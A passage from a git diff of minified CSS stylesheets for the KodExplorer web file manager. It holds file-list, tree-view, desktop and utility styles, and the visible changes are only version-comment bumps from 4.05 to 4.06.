endColorstr='#d9d9d9');background-image:-webkit-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-moz-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-o-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-ms-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:linear-gradient(top,#f3f3f3,#d9d9d9);-pie-background:linear-gradient(to top,#f3f3f3,#d9d9d9);border-radius:3px;padding:0px;}.file-list-icon .file.file-icon-edit{overflow:visible;}.file-list-icon .file.file-icon-edit .filename{position:absolute;z-index:99;}.file-list-icon .file .ico{height:60px;width:60px;padding-top:4px;text-align:center;vertical-align:middle;display:table-cell;}.file-list-icon .file .ico img{height:100% \9;max-height:100%;max-width:100%;border-radius:5px;}.file-list-icon .file .ico.picture{background:none;width:50px;padding-left:5px;}.file-list-icon .file .ico.picture img{-webkit-box-shadow:1px 1px 5px rgba(0,0,0,0.2);-moz-box-shadow:1px 1px 5px rgba(0,0,0,0.2);box-shadow:1px 1px 5px rgba(0,0,0,0.2);width:100% \9;max-width:100%;border-radius:0px;}.file-list-icon .file .ico.picture img.lazyload-ready{-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;}@media screen and (max-width:100000px){div.file-list-icon div.file{ display:inline-block;max-height:152px;vertical-align:top;float:none;height:auto;}}.context-menu-item.set-file-icon-size .box-size-smallx{font-size:0.9em;}.context-menu-item.set-file-icon-size .box-size-small{font-size:1.0em;}.context-menu-item.set-file-icon-size .box-size-default{font-size:1.15em;}.context-menu-item.set-file-icon-size .box-size-big{font-size:1.25em;}.context-menu-item.set-file-icon-size .box-size-bigx{font-size:1.35em;}#list-type-header{z-index:5;position:absolute;width:100%;top:85px;}#main-title{background:#fff;border-bottom:1px solid #e3e3e3;box-shadow:0 2px 10px rgba(0,0,0,0.06);}#main-title .box-shadow(1px 2px 15px #dde) div{cursor:pointer;overflow:hidden;}#main-title div span{float:right;margin-right:8px;margin-top:0px;}#main-title .filename,#main-title .filesize,#main-title .filetype,#main-title .filetime{float:left;cursor:pointer;overflow:hidden;line-height:25px;height:25px;border-right:1px solid #eee;padding-left:10px;margin-left:-10px;font-size:1.0em;color:#448;}#main-title .filename:hover,#main-title .filesize:hover,#main-title .filetype:hover,#main-title .filetime:hover{background:#eee;}#main-title .resize{float:left;width:20px;cursor:col-resize;margin-left:-10px;height:25px;z-index:9999;position:relative;}#main-title .current{background:rgba(0,0,0,0.8);}#main-title .filename{width:250px;padding-left:20px;margin-left:0px;}#main-title .filetype{width:80px;}#main-title .filesize{width:80px;text-align:right;padding-left:0px;padding-right:10px;}#main-title .filetime{width:150px;padding-right:6px;}#main-title .filesize span{margin-right:0px;}#main-title .this{font-weight:800;background:#eee;}.file-list-list,.file-list-split{padding-top:5px;width:100%;z-index:0;}.file-list-list .file,.file-list-split .file{color:#335;border:1px solid transparent;box-shadow:0px 0px 2px rgba(255,255,255,0);margin-left:10px;-webkit-transition:background 0.2s, border 0.2s, color 0.2s;-moz-transition:background 0.2s, border 0.2s, color 0.2s;-o-transition:background 0.2s, border 0.2s, color 0.2s;-ms-transition:background 0.2s, border 0.2s, color 0.2s;transition:background 0.2s, border 0.2s, color 0.2s;height:25px;}.file-list-list .file .ico,.file-list-split .file .ico{-webkit-transition:all 0.168s;-moz-transition:all 0.168s;-o-transition:all 0.168s;-ms-transition:all 0.168s;transition:all 0.168s;}.file-list-list .file2,.file-list-split .file2{background:#edf5ff;}.file-list-list .hover,.file-list-split .hover{border:1px solid #dedede;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fafafa', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fafafa,#eeeeee);background-image:-moz-linear-gradient(top,#fafafa,#eeeeee);background-image:-o-linear-gradient(top,#fafafa,#eeeeee);background-image:-ms-linear-gradient(top,#fafafa,#eeeeee);background-image:linear-gradient(top,#fafafa,#eeeeee);-pie-background:linear-gradient(to top,#fafafa,#eeeeee);border-radius:3px;}.file-list-list .select,.file-list-list .file-select-drag-temp,.file-list-split .select,.file-list-split .file-select-drag-temp{border:1px solid #d2d2d2;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3f3f3', endColorstr='#d9d9d9');background-image:-webkit-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-moz-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-o-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-ms-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:linear-gradient(top,#f3f3f3,#d9d9d9);-pie-background:linear-gradient(to top,#f3f3f3,#d9d9d9);border-radius:3px;padding:0px;}.file-list-list .select .children-more i.font-icon,.file-list-list .file-select-drag-temp .children-more i.font-icon,.file-list-split .select .children-more i.font-icon,.file-list-split .file-select-drag-temp .children-more i.font-icon{color:#63acff !important;}.file-list-list .meta-info,.file-list-split .meta-info{display:inline-block;width:15px;height:15px;padding:0;position:relative;top:6px;margin:0px 0 0 -15px;}.file-list-list .meta-info img,.file-list-split .meta-info img{width:100%;height:100%;}.file-list-list .file,.file-list-split .file{width:80%;overflow:hidden;height:27px;}.file-list-list .file .ico,.file-list-list .file .filename,.file-list-list .file .filetype,.file-list-list .file .filesize,.file-list-list .file .filetime,.file-list-list .file .children-more,.file-list-split .file .ico,.file-list-split .file .filename,.file-list-split .file .filetype,.file-list-split .file .filesize,.file-list-split .file .filetime,.file-list-split .file .children-more{float:left;line-height:28px;height:28px;font-size:1.0em;cursor:default;overflow:hidden;padding-left:15px;}.file-list-list .file .children-more,.file-list-split .file .children-more{width:20px;height:28px;text-align:center;padding-left:0px;}.file-list-list .file .children-more i.font-icon,.file-list-split .file .children-more i.font-icon{font-size:15px;color:#aaa;cursor:pointer;display:inline-block;width:20px;line-height:28px;height:28px;font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;}.file-list-list .file .children-more i.font-icon::after,.file-list-split .file .children-more i.font-icon::after{content:"\f0da";}.file-list-list .file .children-more i.font-icon.cert-open::after,.file-list-split .file .children-more i.font-icon.cert-open::after{content:"\f0d7";}.file-list-list .file .children-more i.font-icon:hover,.file-list-split .file .children-more i.font-icon:hover{background:rgba(0,0,0,0.05);color:#63acff;}.file-list-list .file.loading-children .ico .x-item-file,.file-list-split .file.loading-children .ico .x-item-file{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.file-list-list .file .filetype,.file-list-split .file .filetype{width:90px;}.file-list-list .file .filesize,.file-list-split .file .filesize{width:90px;text-align:right;padding-left:0px;padding-right:10px;}.file-list-list .file .filetime,.file-list-split .file .filetime{width:200px;}.file-list-list .file .filename,.file-list-split .file .filename{width:240px;word-break:break-all;padding-left:0px;}.file-list-list .file .filename .textarea,.file-list-split .file .filename .textarea{font-size:1.0em;display:inline-block;margin-left:-2px;}.file-list-list .file .filename #pathRenameTextarea,.file-list-list .file .filename .newfile,.file-list-split .file .filename #pathRenameTextarea,.file-list-split .file .filename .newfile{height:24px;line-height:24px;z-index:999;width:200px;min-width:150px;border:none;font-size:1.0em;padding-left:2px;padding-top:2px;}.file-list-list .file .filename #pathRenameTextarea:focus,.file-list-list .file .filename .newfile:focus,.file-list-split .file .filename #pathRenameTextarea:focus,.file-list-split .file .filename .newfile:focus{outline:none;}.file-list-list .file .filename .title,.file-list-split .file .filename .title{word-break:break-all;}.file-list-list .file .ico,.file-list-split .file .ico{height:20px;width:20px;padding:0px;line-height:20px;margin-right:4px;margin-top:4px;text-align:center;vertical-align:bottom;display:table-cell;}.file-list-list .file .ico img,.file-list-split .file .ico img{height:100% \9;max-height:100%;max-width:100%;}.file-list-list .file .filename .textarea{position:absolute;}.line-split-box{position:absolute;bottom:0px;right:0px;left:0px;top:0px;margin-top:0;overflow:hidden;}.line-split-box .split-line{border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);width:250px;float:left;height:100%;}.file-list-split{overflow:hidden;}.file-list-split .file{width:97.5%;height:24px;margin-left:0.7%;position:relative;}.file-list-split .file.file2{background:none;}.file-list-split .file .ico,.file-list-split .file .filename,.file-list-split .file .filetype,.file-list-split .file .filesize,.file-list-split .file .filetime,.file-list-split .file .children-open{line-height:22px;height:22px;}.file-list-split .file .ico{margin-left:5px;margin-top:3px;}.file-list-split .file .filename{width:100%;}.file-list-split .file .filename span.title{position:absolute;overflow:hidden;}.file-list-split .file .filename #pathRenameTextarea,.file-list-split .file .filename .newfile{height:23px;line-height:23px;}.file-list-split .file .filename .title .textarea{margin-top:-2px;}.file-list-split .file .children-open{width:20px;height:28px;text-align:center;padding-left:0px;background:rgba(255,255,255,0.4);position:absolute;right:0;}.file-list-split .file .children-open i.font-icon{font-size:1.25em;color:#aaa;display:inline-block;width:20px;line-height:28px;height:28px;font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;-webkit-font-smoothing:antialiased;}.file-list-split .file .children-open i.font-icon::before{content:"\f0da";line-height:24px;}.file-list-split .file.select-split-parent{background:#e3f0ff;}.file-list-split .file.select-split-parent .children-open i.font-icon::before{content:"\f101";font-size:20px;}.file-list-split .split-box{border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);width:250px;overflow:hidden;position:absolute;bottom:0px;left:0px;top:0px;border-bottom:5px solid transparent;}.file-list-split .split-box .content{overflow:auto;height:100%;margin:2px 0px 10px 0px;}.file-list-split .split-box.split-hover{background:#eef7ff;background:rgba(0,0,0,0.01);box-shadow:0 0 100px #eef7ff inset;border-bottom:5px solid #acd9ff;}.file-list-split .split-box.split-select{background:#dff0ff;background:rgba(0,0,0,0.01);box-shadow:0 0 40px #dff0ff inset;margin-left:-1px;border-left:1px solid #eee;border-color:#acd9ff;border-bottom:5px solid #2196F3;}.file-list-split .is-drag-split .split-drag{background:rgba(100,100,100,0.2);}.file-list-split .split-drag{position:absolute;top:0px;right:0px;bottom:0px;width:4px;cursor:col-resize;z-index:55;background:url("../../../images/common/resize.png") 2px 50% no-repeat;}.file-list-split .content-more{height:100px;position:relative;}.file-list-split .file .children-open i.font-icon{background:url("../../../images/common/tree.png") no-repeat 2px -350px \9\0;height:20px \9\0;}.file-list-split .file .children-open i.font-icon:before{display:none \9\0;}.file-list-split .file.select-split-parent .children-open i.font-icon{background:url("../../../images/common/tree.png") no-repeat -30px -350px \9\0;height:20px \9\0;}.file-list-list .file .children-more i.font-icon,.file-list-split .file .children-more i.font-icon{background:url("../../../images/common/tree.png") no-repeat 2px -350px \9\0;height:20px \9\0;}.file-list-list .file .children-more i.font-icon::after,.file-list-split .file .children-more i.font-icon::after{display:none \9\0;}.file-list-list .file .children-more i.font-icon.cert-open,.file-list-split .file .children-more i.font-icon.cert-open{background:url("../../../images/common/tree.png") no-repeat -15px -350px \9\0;}.file-list-list .file .children-more i.font-icon:hover,.file-list-split .file .children-more i.font-icon:hover{background:url("../../../images/common/tree.png") no-repeat -30px -350px \9\0;}.file-list-list .file .children-more i.font-icon.cert-open:hover,.file-list-split .file .children-more i.font-icon.cert-open:hover{background:url("../../../images/common/tree.png") no-repeat -47px -350px \9\0;}.ztree{margin:0px;padding:10px 0px;font-size:1em;}.ztree li{padding:0;margin:0;list-style:none;text-align:left;white-space:nowrap;outline:0;}.ztree li ul{margin:0;padding:0;}.ztree li.level0{margin-bottom:4px;}.ztree li.level0>span.tree_icon{width:20px;}.ztree li span{line-height:24px;}.ztree li span.button{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:24px;width:20px;margin-right:5px;}.ztree li span.button.switch{width:25px;height:25px;margin-right:0px;background:none;text-align:center;line-height:25px;}.ztree li span.button.switch:hover{background:rgba(0,0,0,0.03);}.ztree li span.button.switch:after{content:"\f0da";font-family:FontAwesome;color:#aaa;text-decoration:inherit;font-size:1.25em;line-height:16px;padding-left:6px;-webkit-font-smoothing:antialiased;}.ztree li span.button.switch.noline_docu:after{content:' ';}.ztree li span.button.switch.noline_open:after,.ztree li span.button.switch.noline_open_hover:after{content:"\f0d7";}.ztree li span.button.switch.switch_hover:after{color:#63acff;}.ztree li span.button.ico_loading{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.ztree li span.button.ico_loading .x-item-file{display:none;}.ztree li span.tree_icon{height:21px;width:21px;background:none;overflow:hidden;}.ztree li span.tree_icon img{width:100%;max-width:100%;max-height:100%;}.ztree li a{padding-top:0px;cursor:pointer;text-decoration:none;display:block;margin:0;color:#333;vertical-align:top;line-height:24px;height:24px;padding-left:10px;border:1px solid #fff;position:relative;}.ztree li a:hover{text-decoration:none;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;background:#eee;height:24px;border:1px solid #eee;}.ztree li a.curSelectedNode,.ztree li a.curDropTreeNode{border:1px solid #63acff;background:#63acff;line-height:24px;height:24px;color:#fff;}.ztree li a.curSelectedNode .button.switch:after,.ztree li a.curDropTreeNode .button.switch:after{color:#fff !important;}.ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #fff inset !important;}.ztree li a.curSelectedNode_Edit{border:1px solid #63acff;background:#63acff;color:black;height:24px;}.ztree li a input.rename{height:25px;line-height:24px;padding:0;margin:0;border:none;outline:none;margin-left:-3px;padding-left:3px;width:106px;position:absolute;margin-top:-1px;}.ztree li a span.button.root_docu,.ztree li a span.button.noline_docu{background:none;}.ztree li a .menu-item{display:none;position:absolute;right:4px;top:4px;width:14px;height:13px;box-sizing:content-box;text-align:center;border:1px solid #ccc;background:#fff;border-radius:2px;cursor:pointer;z-index:50;}.ztree li a .menu-item:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.ztree li a .menu-item:hover .cert{border-top-color:#3399ff;}.ztree li a .menu-item .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.ztree li a:hover .menu-item,.ztree li a.curSelectedNode .menu-item{display:block;}ul.ztree.zTreeDragUL{margin:0;padding:0;position:absolute;width:auto;height:auto;background-color:#63acff;border:1px solid #63acff;opacity:0.5;filter:alpha(opacity=50);}ul.ztree.zTreeDragUL li a span.space{display:none !important;}ul.ztree.zTreeDragUL li a{padding:4px 10px 0 10px;color:#fff;}ul.ztree.zTreeDragUL li span.button.switch{display:none;}.ztree li a.tmpTargetNode_inner{background:#0076fc;border:1px solid #3091ff;color:#fff;}.ztree li a.tmpTargetNode_prev{border-bottom:1px solid #f96;}.ztree li a.tmpTargetNode_next{border-bottom:1px solid #f96;}span.tmpzTreeMove_arrow{display:inline-block;margin:4px 0 0 2px;position:absolute;border-color:transparent transparent transparent #fff;border-style:solid;border-width:7px 0px 7px 7px;width:0;height:0;_border-top-color:white;_border-bottom-color:white;_filter:chroma(color=white);}.frame-left .ztree li .file{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:22px;width:18px;margin-right:5px;}html,body{overflow:hidden;overflow-x:hidden;overflow-y:hidden;}body#page-desktop .topbar{background:#eee;background-color:rgba(190,190,190,0.3);box-shadow:0 0 10px rgba(0,0,0,0.2);}body#page-desktop .topbar .content{border-bottom:1px solid #ddd;border-bottom-color:transparent;}body#page-desktop .topbar .content .topbar-menu{color:#fff;border-color:rgba(190,190,190,0.1);}body#page-desktop .topbar .content .topbar-menu,body#page-desktop .topbar .content .topbar-menu.font-icon{text-shadow:0px 0px 0px #fff, 0px 0px 4px #000;}body#page-desktop .topbar .content .top-right div.share-info-user{color:#fff;}body#page-desktop .topbar .content .open .topbar-menu,body#page-desktop .topbar .content .topbar-menu:hover,body#page-desktop .topbar .content .topbar-menu.this{background:rgba(255,255,255,0.3);}body .full-background{display:none;-webkit-transition:all ease-in-out .4s;-moz-transition:all ease-in-out .4s;-o-transition:all ease-in-out .4s;-ms-transition:all ease-in-out .4s;transition:all ease-in-out .4s;background-size:cover;background-repeat:no-repeat;background-position:center;height:100%;width:100%;}body .full-background.desktop{display:block;}body .full-background img{position:absolute;width:1px;height:1px;}body .full-background:before{background:none;}.desktop .file-list-icon{position:absolute;width:100%;bottom:35px;top:40px;overflow:auto;}.desktop .file-list-icon .file{float:none;color:#fff;border:none;display:inline-block;writing-mode:lr-tb;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;-o-transition:all 0.3s;-ms-transition:all 0.3s;transition:all 0.3s;text-shadow:0px 0px 0px #fff, 0px 0px 2px #000, 0px 0px 4px #000;}.desktop .file-list-icon .file .filename{padding-bottom:1px;}.desktop .file-list-icon .file.hover{background:#fff \9;background:rgba(255,255,255,0.2);background-color:#aaa\9;border:none;color:#fff;}.desktop .file-list-icon .file.select,.desktop .file-list-icon .file.file-select-drag-temp,.desktop .file-list-icon .file.select.hover,.desktop .file-list-icon .file.file-select-drag-temp.hover{background:#fff \9;background:rgba(255,255,255,0.4);border:none;color:#fff;background-color:#eee\9;color:#444\9;}.desktop .file-list-icon .file.select .filename,.desktop .file-list-icon .file.file-select-drag-temp .filename,.desktop .file-list-icon .file.select.hover .filename,.desktop .file-list-icon .file.file-select-drag-temp.hover .filename{background:none;}body .file-continer.file-draging-box .file-list-icon .file{float:none;color:#fff;border:none;display:inline-block;text-shadow:0px 0px 0px #fff, 0px 0px 2px #000, 0px 0px 4px #000;}body .file-continer.file-draging-box .file-list-icon .file .filename{padding-bottom:1px;}body .file-continer.file-draging-box .file-list-icon .file.hover{background:#fff \9;background:rgba(255,255,255,0.2);background-color:#aaa\9;border:none;color:#fff;}body .file-continer.file-draging-box .file-list-icon .file.select,body .file-continer.file-draging-box .file-list-icon .file.file-select-drag-temp,body .file-continer.file-draging-box .file-list-icon .file.select.hover,body .file-continer.file-draging-box .file-list-icon .file.file-select-drag-temp.hover{background:#fff \9;background:rgba(255,255,255,0.4);border:none;color:#fff;background-color:#eee\9;color:#444\9;}body .file-continer.file-draging-box .file-list-icon .file.select .filename,body .file-continer.file-draging-box .file-list-icon .file.file-select-drag-temp .filename,body .file-continer.file-draging-box .file-list-icon .file.select.hover .filename,body .file-continer.file-draging-box .file-list-icon .file.file-select-drag-temp.hover .filename{background:none;}@media screen and (max-width:100000px){div.file-list-icon div.file{ display:inline-block;max-height:none;vertical-align:inherit;float:inherit;height:inherit;}}#taskbar{height:32px;position:fixed;bottom:0;left:0;width:100%;padding:0;margin:0;background:url('../../../images/common/desktop/taskbarbg.png');}#taskbar a{position:absolute;text-align:center;width:40px;height:40px;left:6px;}.taskbar-right{position:fixed;right:0px;bottom:-1px;z-index:99999;}.taskbar-right .copyright{float:left;cursor:pointer;color:#fff;padding-top:6px;font-size:20px;z-index:999;width:35px;height:21px;text-align:center;opacity:0.8;filter:alpha(opacity=80);}.taskbar-right .copyright:hover{text-shadow:0 0 10px #fff;opacity:1.0;filter:alpha(opacity=100);}.taskbar-right .tab-hide-all{width:23px;height:30px;border-radius:4px;cursor:pointer;border:1px solid rgba(255,255,255,0.4);float:right;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.taskbar-right .tab-hide-all:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 10px #fff;}.start{background:url('../../../images/common/desktop/start.png') 0 0px no-repeat;display:block;margin-top:-8px;z-index:10000;border-radius:20px;width:40px;height:40px;bottom:0px;left:5px;position:fixed;}.start:hover{text-decoration:none;background-position:0 -40px;}.start:active{text-decoration:none;background-position:0 -80px;}#random-wallpaper{position:absolute;width:40px;height:60px;bottom:30px;right:25px;z-index:10;}#random-wallpaper .flower{width:40px;z-index:3;position:absolute;top:0;cursor:pointer;left:0;}#random-wallpaper .body-line{width:5px;height:30px;position:absolute;bottom:0;left:18px;background-color:#fff;z-index:2;}#menuwin{position:absolute;left:0;bottom:33px;display:none;z-index:9999;}#menuwin #startmenu{border:solid 1px #102a3e;overflow:visible;display:block;float:left;height:404px;width:390px;opacity:0.9;filter:alpha(opacity=90);-webkit-border-radius:5px;position:absolute;box-shadow:inset 0 0 1px #fff;-webkit-box-shadow:inset 0 0 1px #fff;background-color:#619bb9;background:-webkit-gradient(linear,center top,center bottom,from(#327aa4),color-stop(45%,#2e4b5a),to(#5cb0dc));background:rgba(0,0,0,0.5);}#menuwin #leftspliter{margin:0 15px 0 15px;border-top:solid 1px #d6e5f5;}#menuwin #rightspliter{margin:0 7px 0 7px;border-top:solid 1px #596d77;}#menuwin #programs,#menuwin #links{float:left;padding:0;list-style:none;position:relative;}#menuwin #programs{background:#fff;border:solid 1px #365167;height:385px;margin:7px 0 7px 7px;box-shadow:0 0 1px #fff;width:250px;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;-webkit-box-shadow:0 0 1px #fff;-moz-box-shadow:0 0 1px #fff;}#menuwin #programs a{border:solid 1px transparent;display:block;padding:3px;height:30px;line-height:30px;margin:3px 10px;color:#4b4b4b;text-decoration:none;min-width:200px;}#menuwin #programs a:hover{border:solid 1px #7da2ce;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;-webkit-box-shadow:inset 0 0 1px #fff;-moz-box-shadow:inset 0 0 1px #fff;box-shadow:inset 0 0 1px #fff;background-color:#cfe3fd;background:-webkit-gradient(linear,center top,center bottom,from(#dcebfd),to(#c2dcfd));}#menuwin #programs a img{border:0;vertical-align:middle;margin:0 5px 0 0;}#menuwin #links{margin:5px;margin-top:-30px;}#menuwin #links li.icon{height:60px;}#menuwin #links a{border:solid 1px transparent;display:block;margin:5px 0;position:relative;color:#fff;text-decoration:none;min-width:120px;}#menuwin #links a:hover{border:solid 1px #000;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;-webkit-box-shadow:0 0 1px #fff;-moz-box-shadow:0 0 1px #fff;box-shadow:0 0 1px #fff;background-color:#658da0;background:-webkit-gradient(linear,0% 100%,100% 100%,from(#517384),color-stop(50%,#79a3b8),to(#517384));}#menuwin #links a:hover span{background:-webkit-gradient(linear,center top,center bottom,from(transparent),color-stop(49%,transparent),color-stop(50%,rgba(2,37,58,0.5)),to(rgba(63,111,135,0.5)));}#menuwin #links a span{padding:5px;padding-left:10px;display:block;} -/* ver 4.05(2017-08-26) [build 1503738068.0793] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100993.0041] */ \ No newline at end of file diff --git a/static/style/skin/base/app_editor.css b/static/style/skin/base/app_editor.css index f4b7b44..f088757 100755 --- a/static/style/skin/base/app_editor.css +++ b/static/style/skin/base/app_editor.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738068.8512] */ -body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcol